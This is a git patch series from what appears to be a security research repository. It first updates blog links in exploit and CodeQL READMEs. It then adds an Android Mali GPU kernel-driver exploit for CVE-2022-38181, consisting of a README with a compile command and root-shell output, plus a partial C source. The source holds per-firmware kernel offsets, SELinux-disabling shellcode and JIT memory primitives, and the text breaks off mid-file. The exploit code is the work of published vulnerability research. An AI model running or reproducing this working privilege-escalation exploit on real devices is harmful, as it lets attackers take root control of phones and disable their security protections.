Proof-of-concept exploit for a remotely triggerable heap buffer overflow vulnerability in iOS 11.4.1 and macOS 10.13.6. This exploit can be used to crash any vulnerable iOS or macOS device that is connected to the same network as the attacker's computer. The vulnerability can be triggered without any user interaction on the victim's device. The exploit involves sending a TCP packet with non-zero options in the IP and TCP headers. It is possible that some routers or switches will refuse to deliver such packets, but it has worked for me on all the home and office networks that I have tried it on. However, I have found that it is not usually possible to send the malicious packet across the internet.
-For more information about the vulnerability, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407).
+For more information about the vulnerability, see the [blog post](https://github.blog/category/security/apple-xnu-icmp-error-CVE-2018-4407/).
The buffer overflow is in this code [bsd/netinet/ip_icmp.c:339](https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/netinet/ip_icmp.c#L339):
diff --git a/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md b/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md
index dc692ac..9c9de96 100644
--- a/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md
+++ b/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md
@@ -2,7 +2,7 @@
This directory contains a minimal [NFS](https://en.wikipedia.org/wiki/Network_File_System) server. It only implements a very small subset of the [NFS protocol](https://www.ietf.org/rfc/rfc1813.txt): just enough to trigger one of the buffer overflow vulnerabilities in the macOS XNU operating system kernel. The vulnerabilities were fixed in macOS version [10.13.6](https://support.apple.com/en-gb/HT208937).
-For more details about the vulnerabilities, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_nfs_vfsops_CVE-2018-4259).
+For more details about the vulnerabilities, see the [blog post](https://github.blog/category/security/cve-2018-4259-macos-nfs-vulnerability/).
To compile and run (on Linux):
diff --git a/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md b/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md
index ea94b42..1a4e6a7 100644
--- a/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md
+++ b/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md
@@ -4,4 +4,4 @@ Proof-of-concept exploit for remote code execution vulnerability in the packet-m
Update: Apple's fix for the infinite loop bug was incomplete. The fix for CVE-2018-4460 was released on December 5, 2018.
-For details on how to compile and run this exploit, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_packet_mangler_CVE-2017-13904).
+For details on how to compile and run this exploit, see the [blog post](https://github.blog/category/security/CVE-2018-4249-apple-xnu-packet-mangler/).
diff --git a/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md b/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md
index fe05459..bfdae3f 100644
--- a/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md
+++ b/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md
@@ -2,4 +2,4 @@
This directory contains a proof-of-concept exploit for a remote code execution vulnerability in [librelp](https://www.rsyslog.com/librelp/). The vulnerability was fixed in librelp version [1.2.15](https://www.rsyslog.com/librelp-1-2-15/), released on 2018-03-22.
-For more information about the vulnerability and for instructions on how to run the proof-of-concept exploit, please see our blog post which is published on both [Rainer Gerhards's blog](https://rainer.gerhards.net/how-we-found-and-fixed-cve-in-librelp) and on the [LGTM blog](https://lgtm.com/blog/rsyslog_snprintf_CVE-2018-1000140).
+For more information about the vulnerability and for instructions on how to run the proof-of-concept exploit, please see our blog post which is published on both [Rainer Gerhards's blog](https://rainer.gerhards.net/how-we-found-and-fixed-cve-in-librelp) and on the [blog](https://github.blog/category/security/librelp-buffer-overflow-cve-2018-1000140/).
From a29b9b8c90fd7224cdde5d1233a16ac0f7371c7b Mon Sep 17 00:00:00 2001
From: Joseph Katsioloudes
Date: Wed, 30 Nov 2022 22:12:32 +0000
Subject: [PATCH 03/53] Apply suggestions from code review
Co-authored-by: Xavier RENE-CORAIL
---
CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md | 2 +-
CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md | 2 +-
.../cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md | 2 +-
.../00_mbuf_copydata_tainted_size.ql | 2 +-
CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md | 2 +-
CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md | 2 +-
CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md | 2 +-
CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md | 2 +-
CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md | 2 +-
CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md | 2 +-
.../javascript/Etherpad_CVE-2018-6835/alternative/README.md | 2 +-
.../apple/darwin-xnu/DTrace/CVE-2017-13782/README.md | 2 +-
.../apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c | 1 -
.../apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md | 2 +-
.../apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md | 2 +-
.../apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md | 2 +-
.../rsyslog/CVE-2018-1000140_snprintf_librelp/README.md | 2 +-
17 files changed, 16 insertions(+), 17 deletions(-)
diff --git a/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md b/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md
index 9955967..5deeddc 100644
--- a/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md
+++ b/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md
@@ -1,4 +1,4 @@
-[Blog post](https://github.blog/category/security/stack-buffer-overflow-qualcomm-msm/)
+[Blog post](https://securitylab.github.com/research/stack-buffer-overflow-qualcomm-msm/)
[Snapshot for this demo](https://github.com/github/securitylab/releases/download/qualcomm-msm-codeql-database/msm-4.4-revision-2017-May-07--08-33-56.zip)
diff --git a/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md b/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md
index fe8c552..042a1df 100644
--- a/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md
+++ b/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md
@@ -1,4 +1,4 @@
-[Blog post](https://github.blog/category/security/apple-xnu-dtrace-CVE-2017-13782/)
+[Blog post](https://securitylab.github.com/research/apple-xnu-dtrace-CVE-2017-13782/)
Bug was fixed in [macOS High Sierra 10.13.1](https://support.apple.com/en-us/HT208221).
diff --git a/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md b/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md
index c0151de..d8abe1c 100644
--- a/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md
+++ b/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md
@@ -1,4 +1,4 @@
-[Blog post](https://github.blog/category/security/apple-xnu-nfs-boot/)
+[Blog post](https://securitylab.github.com/research/apple-xnu-nfs-boot/)
Bug was fixed in [macOS High Sierra 10.13.4](https://support.apple.com/en-gb/HT208692).
diff --git a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql
index 29ecd05..8a11f96 100644
--- a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql
+++ b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql
@@ -10,7 +10,7 @@
/*
* This query is explained in detail in this blog post:
*
- * https://github.blog/category/security/apple-xnu-icmp-error-CVE-2018-4407/
+ * https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/
*
* It is based on the assumption that the function `m_mtod`, which returns
* a pointer to the data stored in an `mbuf`, often returns a buffer
diff --git a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md
index 9ec2dfe..adbf857 100644
--- a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md
+++ b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md
@@ -2,4 +2,4 @@
Use [this snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13.6-codeql-database/xnu-4570.71.2_macOS-10.13.6_Semmle-1.18.0.zip) for the demo.
-There are two parts to this demo. The first part is `00_mbuf_copydata_tainted_size.ql`, which is the dataflow query that found the bug. It is explained in detail in [this blog post](https://github.blog/category/security/apple-xnu-icmp-error-CVE-2018-4407/). The problem with this query is that it does not find the true source of the untrusted data. This is because it assumes that any call to the function named `m_mtod` can return untrusted data. But not every `mbuf` contains untrusted data. So the second part of the demo, corresponding to [this blog post](https://github.blog/category/security/apple-xnu-exploit-icmp-poc/), is to use dataflow analysis to find a path that gets an untrusted `mbuf` into `icmp_error`. The second part of the demo is developed in steps, starting with `01_paths_to_icmp_error.ql`.
+There are two parts to this demo. The first part is `00_mbuf_copydata_tainted_size.ql`, which is the dataflow query that found the bug. It is explained in detail in [this blog post](https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/). The problem with this query is that it does not find the true source of the untrusted data. This is because it assumes that any call to the function named `m_mtod` can return untrusted data. But not every `mbuf` contains untrusted data. So the second part of the demo, corresponding to [this blog post](https://securitylab.github.com/research/apple-xnu-exploit-icmp-poc/), is to use dataflow analysis to find a path that gets an untrusted `mbuf` into `icmp_error`. The second part of the demo is developed in steps, starting with `01_paths_to_icmp_error.ql`.
diff --git a/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md b/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md
index b0039e9..9304638 100644
--- a/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md
+++ b/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md
@@ -1,4 +1,4 @@
-https://github.blog/category/security/CVE-2018-4249-apple-xnu-packet-mangler/
+https://securitylab.github.com/research/CVE-2018-4249-apple-xnu-packet-mangler/
There were multiple bugs in `packet_mangler.c`. One of the infinite loop bugs was fixed in macOS High Sierra 10.13.2. The other bugs were fixed in macOS High Sierra 10.13.5.
diff --git a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md
index ee53f5c..b03a616 100644
--- a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md
+++ b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md
@@ -1,4 +1,4 @@
-[Blog post](https://github.blog/category/security/librelp-buffer-overflow-cve-2018-1000140/).
+[Blog post](https://securitylab.github.com/research/librelp-buffer-overflow-cve-2018-1000140/).
This bug was found by one of [CodeQL](https://codeql.github.com/) default queries. However, it also makes a good example of using QL interactively. The queries in this directory show how you can interactively develop the query.
diff --git a/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md b/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md
index 5b32d6c..f53ac28 100644
--- a/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md
+++ b/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md
@@ -1,4 +1,4 @@
-[Blog post](https://github.blog/category/security/apache-struts-vulnerability-cve-2017-9805/)
+[Blog post](https://securitylab.github.com/research/apache-struts-vulnerability-cve-2017-9805/)
[This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-codeql-database/apache-struts-91ae344-CVE-2017-9805.zip) has the bug.
diff --git a/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md b/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md
index bd6e664..e03b9a1 100644
--- a/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md
+++ b/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md
@@ -1,6 +1,6 @@
# Apache Struts CVE-2018-11776
-[Blog post](https://github.blog/category/security/apache-struts-CVE-2018-11776/)
+[Blog post](https://securitylab.github.com/research/apache-struts-CVE-2018-11776/)
[This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-CVE-2018-11776-codeql-database/apache-struts-7fd1622-CVE-2018-11776.zip) has the bug.
diff --git a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md
index ca4dff7..ab633c3 100644
--- a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md
+++ b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md
@@ -1,4 +1,4 @@
-[Blog post](https://github.blog/category/security/etherpad-reflected-file-download/)
+[Blog post](https://securitylab.github.com/research/etherpad-reflected-file-download/)
[This snapshot](https://github.com/github/securitylab/releases/download/etherpad-vulnerable-codeql-database/Etherpad_1.6.2.zip) has the vulnerability.
diff --git a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md
index fe520f4..041dc4b 100644
--- a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md
+++ b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md
@@ -1,5 +1,5 @@
This is an alternative presentation of the query from the blog post about
-[Detecting Reflected File Download vulnerabilities using QL](https://github.blog/category/security/etherpad-reflected-file-download/),
+[Detecting Reflected File Download vulnerabilities using QL](https://securitylab.github.com/research/etherpad-reflected-file-download/),
phrasing it as a customization of Semmle's standard Reflected XSS query.
Use [this snapshot](https://github.com/github/securitylab/releases/download/etherpad-vulnerable-codeql-database/Etherpad_1.6.2.zip) (etherpad-lite v1.6.2)
diff --git a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md
index da1c15b..96d0ac4 100644
--- a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md
+++ b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md
@@ -1,4 +1,4 @@
-For more information about this exploit PoC, see the [blog post](https://github.blog/category/security/apple-xnu-dtrace-CVE-2017-13782/).
+For more information about this exploit PoC, see the [blog post](https://securitylab.github.com/research/apple-xnu-dtrace-CVE-2017-13782/).
This exploit PoC is designed for macOS High Sierra version 10.13. Apple released a patch on [Oct 31, 2017](https://support.apple.com/en-us/HT208221).
diff --git a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c
index 10802c0..f838f4f 100644
--- a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c
+++ b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c
@@ -2,7 +2,6 @@
* Copyright Kevin Backhouse / Semmle Ltd (2017)
* License: Apache License 2.0
*
- * For more information: https://github.blog/category/security/
*/
#include
#include
diff --git a/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md b/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md
index 5515cce..b6b0d40 100644
--- a/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md
+++ b/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md
@@ -2,7 +2,7 @@
Proof-of-concept exploit for a remotely triggerable heap buffer overflow vulnerability in iOS 11.4.1 and macOS 10.13.6. This exploit can be used to crash any vulnerable iOS or macOS device that is connected to the same network as the attacker's computer. The vulnerability can be triggered without any user interaction on the victim's device. The exploit involves sending a TCP packet with non-zero options in the IP and TCP headers. It is possible that some routers or switches will refuse to deliver such packets, but it has worked for me on all the home and office networks that I have tried it on. However, I have found that it is not usually possible to send the malicious packet across the internet.
-For more information about the vulnerability, see the [blog post](https://github.blog/category/security/apple-xnu-icmp-error-CVE-2018-4407/).
+For more information about the vulnerability, see the [blog post](https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/).
The buffer overflow is in this code [bsd/netinet/ip_icmp.c:339](https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/netinet/ip_icmp.c#L339):
diff --git a/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md b/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md
index 9c9de96..6d8a9bb 100644
--- a/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md
+++ b/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md
@@ -2,7 +2,7 @@
This directory contains a minimal [NFS](https://en.wikipedia.org/wiki/Network_File_System) server. It only implements a very small subset of the [NFS protocol](https://www.ietf.org/rfc/rfc1813.txt): just enough to trigger one of the buffer overflow vulnerabilities in the macOS XNU operating system kernel. The vulnerabilities were fixed in macOS version [10.13.6](https://support.apple.com/en-gb/HT208937).
-For more details about the vulnerabilities, see the [blog post](https://github.blog/category/security/cve-2018-4259-macos-nfs-vulnerability/).
+For more details about the vulnerabilities, see the [blog post](https://securitylab.github.com/research/cve-2018-4259-macos-nfs-vulnerability/).
To compile and run (on Linux):
diff --git a/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md b/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md
index 1a4e6a7..a55efe8 100644
--- a/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md
+++ b/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md
@@ -4,4 +4,4 @@ Proof-of-concept exploit for remote code execution vulnerability in the packet-m
Update: Apple's fix for the infinite loop bug was incomplete. The fix for CVE-2018-4460 was released on December 5, 2018.
-For details on how to compile and run this exploit, see the [blog post](https://github.blog/category/security/CVE-2018-4249-apple-xnu-packet-mangler/).
+For details on how to compile and run this exploit, see the [blog post](https://securitylab.github.com/research/CVE-2018-4249-apple-xnu-packet-mangler/).
diff --git a/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md b/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md
index bfdae3f..989f3aa 100644
--- a/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md
+++ b/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md
@@ -2,4 +2,4 @@
This directory contains a proof-of-concept exploit for a remote code execution vulnerability in [librelp](https://www.rsyslog.com/librelp/). The vulnerability was fixed in librelp version [1.2.15](https://www.rsyslog.com/librelp-1-2-15/), released on 2018-03-22.
-For more information about the vulnerability and for instructions on how to run the proof-of-concept exploit, please see our blog post which is published on both [Rainer Gerhards's blog](https://rainer.gerhards.net/how-we-found-and-fixed-cve-in-librelp) and on the [blog](https://github.blog/category/security/librelp-buffer-overflow-cve-2018-1000140/).
+For more information about the vulnerability and for instructions on how to run the proof-of-concept exploit, please see our blog post which is published on both [Rainer Gerhards's blog](https://rainer.gerhards.net/how-we-found-and-fixed-cve-in-librelp) and on the [blog](https://securitylab.github.com/research/librelp-buffer-overflow-cve-2018-1000140/).
From acfdbef031174bc11ca9cc59ce4e78d50cc754c3 Mon Sep 17 00:00:00 2001
From: Man Yue Mo
Date: Fri, 20 Jan 2023 15:24:01 +0000
Subject: [PATCH 04/53] Initial commit.
---
.../Android/Mali/CVE_2022_38181/README.md | 41 +
.../Android/Mali/CVE_2022_38181/hello-jni2.c | 759 ++++++++++
.../Android/Mali/CVE_2022_38181/mali.h | 1060 ++++++++++++++
.../Mali/CVE_2022_38181/mali_base_jm_kernel.h | 1216 +++++++++++++++++
.../Mali/CVE_2022_38181/mali_shrinker_mmap.c | 796 +++++++++++
.../Android/Mali/CVE_2022_38181/midgard.h | 260 ++++
6 files changed, 4132 insertions(+)
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_38181/README.md
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_38181/hello-jni2.c
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_38181/mali.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/README.md b/SecurityExploits/Android/Mali/CVE_2022_38181/README.md
new file mode 100644
index 0000000..71df73d
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/README.md
@@ -0,0 +1,41 @@
+## Exploit for CVE-2022-20186
+
+The write up can be found [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug). This is a bug in the Arm Mali kernel driver that I reported in July 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+
+The exploit is tested on the Google Pixel 6. The original exploit that was sent to Google is included as `hello-jni.c` as a reference and was tested on the July 2022 patch of the Pixel 6. Due to the fact that Pixel 6 cannot be downgraded from Android 13 to Android 12, an updated version of the exploit, `mali_shrinker_mmap.c` is included, which supports various firmware in Android 13, including the December patch, which is the latest affected version. For reference, I used the following command to compile with clang in ndk-21:
+
+```
+android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_shrinker_mmap.c -o mali_shrinker_mmap
+```
+
+The exploit should be run a couple of minutes after boot and should be fairly reliable. If successful, it should disable SELinux and gain root.
+
+```
+oriole:/ $ /data/local/tmp/mali_shrinker_mmap
+fingerprint: google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys
+failed, retry.
+failed, retry.
+region freed 51
+read 0
+cleanup flush region
+jit_freed
+jit_free commit: 0 0
+Found freed_idx 0
+Found pgd 20, 769c414000
+overwrite addr : 7701100710 710
+overwrite addr : 7700f00710 710
+overwrite addr : 7701100710 710
+overwrite addr : 7700f00710 710
+overwrite addr : 7700d00710 710
+overwrite addr : 7700f00710 710
+overwrite addr : 7700d00710 710
+overwrite addr : 7701100fd4 fd4
+overwrite addr : 7700f00fd4 fd4
+overwrite addr : 7701100fd4 fd4
+overwrite addr : 7700f00fd4 fd4
+overwrite addr : 7700d00fd4 fd4
+overwrite addr : 7700f00fd4 fd4
+overwrite addr : 7700d00fd4 fd4
+result 50
+oriole:/ #
+```
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/hello-jni2.c b/SecurityExploits/Android/Mali/CVE_2022_38181/hello-jni2.c
new file mode 100644
index 0000000..b9ef3ce
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/hello-jni2.c
@@ -0,0 +1,759 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include "stdbool.h"
+#include
+#include
+
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "midgard.h"
+
+#ifdef SHELL
+#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
+#else
+#include
+#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
+
+#endif //SHELL
+
+#define MALI "/dev/mali0"
+
+#define PAGE_SHIFT 12
+
+#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576)
+
+#define PFN_DOWN(x) ((x) >> PAGE_SHIFT)
+
+#define SPRAY_PAGES 25
+
+#define SPRAY_NUM 64
+
+#define FLUSH_SIZE (0x1000 * 0x1000)
+
+#define SPRAY_CPU 0
+
+#define POOL_SIZE 16384
+
+#define RESERVED_SIZE 32
+
+#define TOTAL_RESERVED_SIZE 1024
+
+#define FLUSH_REGION_SIZE 500
+
+#define NUM_TRIALS 100
+
+#define KERNEL_BASE 0x80000000
+
+#define OVERWRITE_INDEX 256
+
+#define ADRP_INIT_INDEX 0
+
+#define ADD_INIT_INDEX 1
+
+#define ADRP_COMMIT_INDEX 2
+
+#define ADD_COMMIT_INDEX 3
+
+#define AVC_DENY_2108 0x92df1c
+
+#define SEL_READ_ENFORCE_2108 0x942ae4
+
+#define INIT_CRED_2108 0x29a0570
+
+#define COMMIT_CREDS_2108 0x180b0c
+
+#define ADD_INIT_2108 0x9115c000
+
+#define ADD_COMMIT_2108 0x912c3108
+
+#define AVC_DENY_2201 0x930af4
+
+#define SEL_READ_ENFORCE_2201 0x9456bc
+
+#define INIT_CRED_2201 0x29b0570
+
+#define COMMIT_CREDS_2201 0x183df0
+
+#define ADD_INIT_2201 0x9115c000
+
+#define ADD_COMMIT_2201 0x9137c108
+
+#define AVC_DENY_2202 0x930b50
+
+#define SEL_READ_ENFORCE_2202 0x94551c
+
+#define INIT_CRED_2202 0x29b0570
+
+#define COMMIT_CREDS_2202 0x183e3c
+
+#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570
+
+#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c
+
+#define AVC_DENY_2207 0x927664
+
+#define SEL_READ_ENFORCE_2207 0x93bf5c
+
+#define INIT_CRED_2207 0x29e07f0
+
+#define COMMIT_CREDS_2207 0x18629c
+
+#define ADD_INIT_2207 0x911fc000 //add x0, x0, #0x7f0
+
+#define ADD_COMMIT_2207 0x910a7108 //add x8, x8, #0x29c
+
+static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2207;
+
+static uint64_t avc_deny = AVC_DENY_2207;
+
+/*
+Overwriting SELinux to permissive
+ strb wzr, [x0]
+ mov x0, #0
+ ret
+*/
+static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
+
+static uint32_t root_code[8] = {0};
+
+static uint8_t jit_id = 1;
+static uint8_t atom_number = 1;
+static uint64_t gpu_va[SPRAY_NUM] = {0};
+static int gpu_va_idx = 0;
+static void* flush_regions[FLUSH_REGION_SIZE];
+static void* alias_regions[SPRAY_NUM] = {0};
+static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
+
+
+struct base_mem_handle {
+ struct {
+ __u64 handle;
+ } basep;
+};
+
+struct base_mem_aliasing_info {
+ struct base_mem_handle handle;
+ __u64 offset;
+ __u64 length;
+};
+
+static int open_dev(char* name) {
+ int fd = open(name, O_RDWR);
+ if (fd == -1) {
+ err(1, "cannot open %s\n", name);
+ }
+ return fd;
+}
+
+void setup_mali(int fd, int group_id) {
+ struct kbase_ioctl_version_check param = {0};
+ if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) {
+ err(1, "version check failed\n");
+ }
+ struct kbase_ioctl_set_flags set_flags = {group_id << 3};
+ if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
+ err(1, "set flags failed\n");
+ }
+}
+
+void* setup_tracking_page(int fd) {
+ void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE);
+ if (region == MAP_FAILED) {
+ err(1, "setup tracking page failed");
+ }
+ return region;
+}
+
+void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) {
+ struct kbase_ioctl_mem_jit_init init = {0};
+ init.va_pages = va_pages;
+ init.max_allocations = 255;
+ init.trim_level = trim_level;
+ init.group_id = group_id;
+ init.phys_pages = va_pages;
+
+ if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) {
+ err(1, "jit init failed\n");
+ }
+}
+
+uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr) {
+ struct base_jit_alloc_info info = {0};
+ struct base_jd_atom_v2 atom = {0};
+
+ info.id = id;
+ info.gpu_alloc_addr = gpu_alloc_addr;
+ info.va_pages = va_pages;
+ info.commit_pages = va_pages;
+ info.extension = 0x1000;
+
+ atom.jc = (uint64_t)(&info);
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;
+ atom.nr_extres = 1;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+ return *((uint64_t*)gpu_alloc_addr);
+}
+
+void jit_free(int fd, uint8_t atom_number, uint8_t id) {
+ uint8_t free_id = id;
+
+ struct base_jd_atom_v2 atom = {0};
+
+ atom.jc = (uint64_t)(&free_id);
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE;
+ atom.nr_extres = 1;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+
+}
+
